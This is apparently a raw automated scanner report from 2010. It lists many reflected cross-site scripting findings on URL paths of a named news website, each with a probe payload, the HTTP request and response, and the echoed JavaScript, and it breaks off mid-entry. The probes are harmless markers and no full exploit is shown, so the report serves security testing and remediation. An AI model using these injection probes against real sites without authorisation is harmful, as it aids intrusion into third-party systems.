Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14584
Date: Mon, 13 Dec 2010 21:36:22 GMT
X-Varnish: 570588216
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f39b8"%3b6655f0ddbd4 was submitted in the REST URL parameter 1. This input was echoed as f39b8";6655f0ddbd4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimediaf39b8"%3b6655f0ddbd4/image/todays-newspaper-dec-13-2010/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14625
Date: Mon, 13 Dec 2010 21:36:20 GMT
X-Varnish: 570588160
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error |
...[SNIP]...
">
window.dctile = Number(window.dctile) + 1 || 1;
if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""}
var size="728x90,960x250,960x30,900x30,900x300";
var type="multimediaf39b8";6655f0ddbd4";
var site="wash.times";
var zone="";
var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44370"%3b2069bef9b29 was submitted in the REST URL parameter 1. This input was echoed as 44370";2069bef9b29 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news44370"%3b2069bef9b29/2010/dec/12/us-free-traders-sour-on-china/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14544
Date: Mon, 13 Dec 2010 21:27:57 GMT
X-Varnish: 570576678
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error |
...[SNIP]...
script">
window.dctile = Number(window.dctile) + 1 || 1;
if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""}
var size="728x90,960x250,960x30,900x30,900x300";
var type="news44370";2069bef9b29";
var site="wash.times";
var zone="";
var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8d81'%3b6d52a2a45b0 was submitted in the REST URL parameter 1. This input was echoed as a8d81';6d52a2a45b0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsa8d81'%3b6d52a2a45b0/2010/dec/12/us-free-traders-sour-on-china/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14712
Date: Mon, 13 Dec 2010 21:28:07 GMT
X-Varnish: 570576928
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40cfb'%3b49bc6e52f6a was submitted in the REST URL parameter 1. This input was echoed as 40cfb';49bc6e52f6a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news40cfb'%3b49bc6e52f6a/inside-the-beltway/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14735
Date: Mon, 13 Dec 2010 21:26:02 GMT
X-Varnish: 570574664
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5f69"%3bb06abe34d4 was submitted in the REST URL parameter 1. This input was echoed as c5f69";b06abe34d4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsc5f69"%3bb06abe34d4/inside-the-beltway/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14700
Date: Mon, 13 Dec 2010 21:25:45 GMT
X-Varnish: 570574126
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error |
...[SNIP]...
script">
window.dctile = Number(window.dctile) + 1 || 1;
if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""}
var size="728x90,960x250,960x30,900x30,900x300";
var type="newsc5f69";b06abe34d4";
var site="wash.times";
var zone="";
var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff9ee"%3b009790cd52a was submitted in the REST URL parameter 1. This input was echoed as ff9ee";009790cd52a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsff9ee"%3b009790cd52a/inside-the-ring/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14735
Date: Mon, 13 Dec 2010 21:26:22 GMT
X-Varnish: 570574882
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error |
...[SNIP]...
script">
window.dctile = Number(window.dctile) + 1 || 1;
if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""}
var size="728x90,960x250,960x30,900x30,900x300";
var type="newsff9ee";009790cd52a";
var site="wash.times";
var zone="";
var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 734fd'%3b2bdbff600b5 was submitted in the REST URL parameter 1. This input was echoed as 734fd';2bdbff600b5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news734fd'%3b2bdbff600b5/inside-the-ring/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14729
Date: Mon, 13 Dec 2010 21:26:36 GMT
X-Varnish: 570575350
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab331'%3bddfbae649df was submitted in the REST URL parameter 1. This input was echoed as ab331';ddfbae649df in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsab331'%3bddfbae649df/pruden-on-politics/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14571
Date: Mon, 13 Dec 2010 21:27:22 GMT
X-Varnish: 570576208
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b797"%3b7b7d238c6b8 was submitted in the REST URL parameter 1. This input was echoed as 6b797";7b7d238c6b8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news6b797"%3b7b7d238c6b8/pruden-on-politics/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14571
Date: Mon, 13 Dec 2010 21:27:09 GMT
X-Varnish: 570575941
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error |
...[SNIP]...
script">
window.dctile = Number(window.dctile) + 1 || 1;
if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""}
var size="728x90,960x250,960x30,900x30,900x300";
var type="news6b797";7b7d238c6b8";
var site="wash.times";
var zone="";
var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 126f6"%3b150397f1160 was submitted in the REST URL parameter 1. This input was echoed as 126f6";150397f1160 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion126f6"%3b150397f1160/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14583
Date: Mon, 13 Dec 2010 21:29:52 GMT
X-Varnish: 570579193
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ipt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="opinion126f6";150397f1160"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 475e0'%3bd66702a4c48 was submitted in the REST URL parameter 1. This input was echoed as 475e0';d66702a4c48 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion475e0'%3bd66702a4c48/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14774
Date: Mon, 13 Dec 2010 21:30:01 GMT
X-Varnish: 570579547
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f466a"%3bf9c7ac7f854 was submitted in the REST URL parameter 1. This input was echoed as f466a";f9c7ac7f854 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinionf466a"%3bf9c7ac7f854/blankley/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14610
Date: Mon, 13 Dec 2010 21:30:29 GMT
X-Varnish: 570580097
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ipt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="opinionf466a";f9c7ac7f854"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cf15'%3bbd45ecbbe80 was submitted in the REST URL parameter 1. This input was echoed as 1cf15';bd45ecbbe80 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion1cf15'%3bbd45ecbbe80/blankley/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14774
Date: Mon, 13 Dec 2010 21:30:40 GMT
X-Varnish: 570580335
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6352f"%3b12782a90771 was submitted in the REST URL parameter 1. This input was echoed as 6352f";12782a90771 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion6352f"%3b12782a90771/commentary/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14774
Date: Mon, 13 Dec 2010 21:28:01 GMT
X-Varnish: 570576985
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ipt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="opinion6352f";12782a90771"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d1c6'%3bd1057e2bcfb was submitted in the REST URL parameter 1. This input was echoed as 3d1c6';d1057e2bcfb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion3d1c6'%3bd1057e2bcfb/commentary/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14774
Date: Mon, 13 Dec 2010 21:28:02 GMT
X-Varnish: 570577034
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6fa50'%3b12579fa5c89 was submitted in the REST URL parameter 1. This input was echoed as 6fa50';12579fa5c89 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion6fa50'%3b12579fa5c89/decker/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14583
Date: Mon, 13 Dec 2010 21:28:46 GMT
X-Varnish: 570577935
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99e83"%3b5c06b0c9a1e was submitted in the REST URL parameter 1. This input was echoed as 99e83";5c06b0c9a1e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion99e83"%3b5c06b0c9a1e/decker/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14751
Date: Mon, 13 Dec 2010 21:28:33 GMT
X-Varnish: 570577726
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ipt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="opinion99e83";5c06b0c9a1e"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20e26'%3b16a79618ec3 was submitted in the REST URL parameter 1. This input was echoed as 20e26';16a79618ec3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion20e26'%3b16a79618ec3/editorials/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14569
Date: Mon, 13 Dec 2010 21:27:23 GMT
X-Varnish: 570576225
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97820"%3b242275b6969 was submitted in the REST URL parameter 1. This input was echoed as 97820";242275b6969 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion97820"%3b242275b6969/editorials/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14569
Date: Mon, 13 Dec 2010 21:27:21 GMT
X-Varnish: 570576197
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ipt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="opinion97820";242275b6969"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82df8"%3b445ce5b929 was submitted in the REST URL parameter 1. This input was echoed as 82df8";445ce5b929 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion82df8"%3b445ce5b929/kuhner/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14763
Date: Mon, 13 Dec 2010 21:30:08 GMT
X-Varnish: 570579678
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ipt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="opinion82df8";445ce5b929"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bc58'%3b9046ee8ccfb was submitted in the REST URL parameter 1. This input was echoed as 2bc58';9046ee8ccfb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion2bc58'%3b9046ee8ccfb/kuhner/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14744
Date: Mon, 13 Dec 2010 21:30:31 GMT
X-Varnish: 570579900
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5ee0'%3b4204e92570a was submitted in the REST URL parameter 1. This input was echoed as f5ee0';4204e92570a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
